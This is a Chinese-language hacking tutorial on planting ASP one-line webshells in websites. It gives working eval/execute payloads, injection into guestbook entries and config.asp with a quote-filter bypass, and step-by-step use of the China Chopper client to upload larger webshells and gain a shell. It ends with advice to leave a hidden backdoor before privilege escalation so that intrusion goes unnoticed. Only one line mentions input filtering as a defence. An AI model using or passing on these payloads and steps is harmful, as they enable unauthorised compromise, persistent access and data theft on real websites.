一句話使用方法

1進入後臺以後找網站信息配置

2在企業郵局裏面拷貝出來郵箱作好記錄，恢復用

3在企業郵箱內插入一句話

4保存配置，打開中國菜刀

5http://www.xxxx.cn/inc/config.asp 其中XXXX爲你的目標站

6菜刀右鍵添加，把網址第五步的丟進去  右邊那一欄輸入一句話的密碼pass（默認）下

面的腳本類型爲asp 其餘不變  最後點添加

7用中國菜刀連接點擊文件管理 

8在inc目錄下上傳一個小馬（注意更改後綴爲asp）

9 打開http://www.xxxx.cn/inc/你的小馬名字.asp

10 打開小馬輸入密碼進入小馬

11 複製文件地址輸入上面的欄中後面加大馬名字.asp

12 把大馬以txt文檔形式打開，複製粘貼至下面的欄中。

13 保存

14 訪問11步驟中的大馬

15 輸入大馬密碼，成功獲得shell

一句話的總結

一 留言本插入

在留言框內 插入一句話 

<%eval request("#")%>

<%execute request("#")%>

┼攠數畣整爠煥敵瑳∨≡┩愾

這三個都是asp一句話，在國內小站asp仍是比較氾濫的。若是當前web沒有進行過濾能夠直接以留言的方式提交過去。

若是過濾不嚴能夠閉合插入。如最簡單的

%><%eval request("#")%><% 

好比當前頁

http://site/guest/guestbook.asp

你在當前頁提交一句話後是不能直接連接http://site/guestbook.asp的，由於一句話代碼並不在這裏！

這裏須要一個前提條件

1）他的數據庫是爲了防止*.mdb 下載而改名爲

*.asa or *.asp 格式

2）知足了條件1的同時你知道他的數據庫位置

ex:http://site/guest/db/guestdb.asa or guest.asp

當知足第一條 和第二條中的兩小條後

能夠成功插入一句話

數據庫修改事後綴名 asa asp

知道具體位置

知足以上條件後 在 http://site/guest/guestbook.asp 插入一句話

連接 http://site/guest/db/guestdb.asa

二 配置文件插入一句話

通常而言，後臺插一句話，若是數據庫擴展名是asp的話，那麼插數據庫，可是若是有配置文件能夠插的話，那確定是插入配置文件了，可是插入配置文件有一個很大的風險，那就是一旦出錯那麼全盤皆輸，有可能不只僅形成後臺沒法登錄，甚至有多是整個網站系統崩潰，因此插入配置文件，請慎之又慎。

話歸正題，若是想插入配置文件，通常是config.asp，那麼首先須要瞭解這個文件的通常狀況。

網站的配置通常是保存網站名，地址，email之類的，既然是字符，那麼格式應當是

webname=「test website」

對於這樣的配置插入一句話的話，咱們的機會就是替換test website，那麼須要閉合2個」，同時要插入一句話，語句能夠這樣

「%><%eval request(「d」%><%s=」

那麼在config.asp中就是

webname=「 「%><%eval request(「d」%><%s=」 」

第一個」是閉合前面的配置文件中的」，%>就是閉合前一段腳本，以後插入一句話<%eval request(「d」%>，如今要閉合原來的」和%>

因此加入<%s=」，這裏特別要注意「s=」，若是沒有這個等號的話，那麼就會成<%」 「,這樣必將出錯。

好了，這是常規的辦法，如今咱們回到開始那個問題，按照前面的方法插入

插入後，咱們再點擊「網站設置」 ，出現錯誤

從這個錯誤，咱們能夠獲得2個信息。

第一，配置文件的路徑：http://www.target.com/zfbm/zfb/inc/config.asp

第二，網站名的變量爲webname。

因爲咱們閉合前面雙引號起」的那個雙引號收」被過濾成單引號’，因此就成了webname=」 ‘，這樣的話那麼這個雙引號沒有閉合，因爲雙引號是vbscript的控制符，沒有閉合config.asp運行必然出錯。那麼咱們遇到這種雙引號被過濾了的狀況改怎麼辦呢。

因爲插入一句話必需要用雙引號括起來，而輸入雙引號又被過濾，因此咱們能夠利用他們自身的雙引號來解決。

在配置文件中，咱們還能夠看到這樣一些設置

就是配置網站的公告數 ，文章數等。能夠假設一下，他必然是整數賦值，沒有雙引號包括

num=5

num是整數型，否則就成字符了num=」5〃

那麼咱們的一句話就能夠這樣構建

在公告數中咱們插入5%><%eval request(webname)%><%

必需要有5，否則將會出錯，在網站名中咱們插入」open」

因爲咱們沒有輸入雙引號，不存在過濾，咱們利用 配置文件自己的雙引號來達到目的。那麼配置文件如今的內容以下

<% ……………….. webname=」open」 num=5%><%eval request(webname)%><% webnum=7 ……. %> 咱們的一句話就相應爲

eval request(「open」)，open爲seo/’>密碼。

用菜刀成功鏈接

從上可見，咱們成功利用配置文件自己避開了一句話中雙引號被過濾的問題。

那麼在網頁設計方面，咱們能夠增長過濾<,%,>或者組合<%,%>這些特殊符號，禁止這些符號的輸入，那麼將大大增長網頁安全。

三 網站友情連接或者是管理員添加插入一句話，等等...就跟配置文件相似

當成功在配置文件中插入一句話後，能夠鏈接 http://site/inc/config.asp

也就是說你的一句話最終保存在那個asp文件中你就去連那個ASP文件，並非你在留言本主頁插入的一句話你就去鏈接留言本主頁！

你須要知道你的一句話的歸屬地。

在成功獲得webshell ，須要先留後門在進一步提權。由於你提權時弄出動靜後會前功盡棄。留一個一句話是很好的選擇。

能夠把後門直接寫入在asp文件中，也能夠本身從新上傳一個ASP馬，在修改原有ASP文件的同時須要備份一下以防插掛後能夠補救。有人喜歡插入在dbcon.asp 數據鏈接文件中或者其餘位置。這個跟當時狀況而定。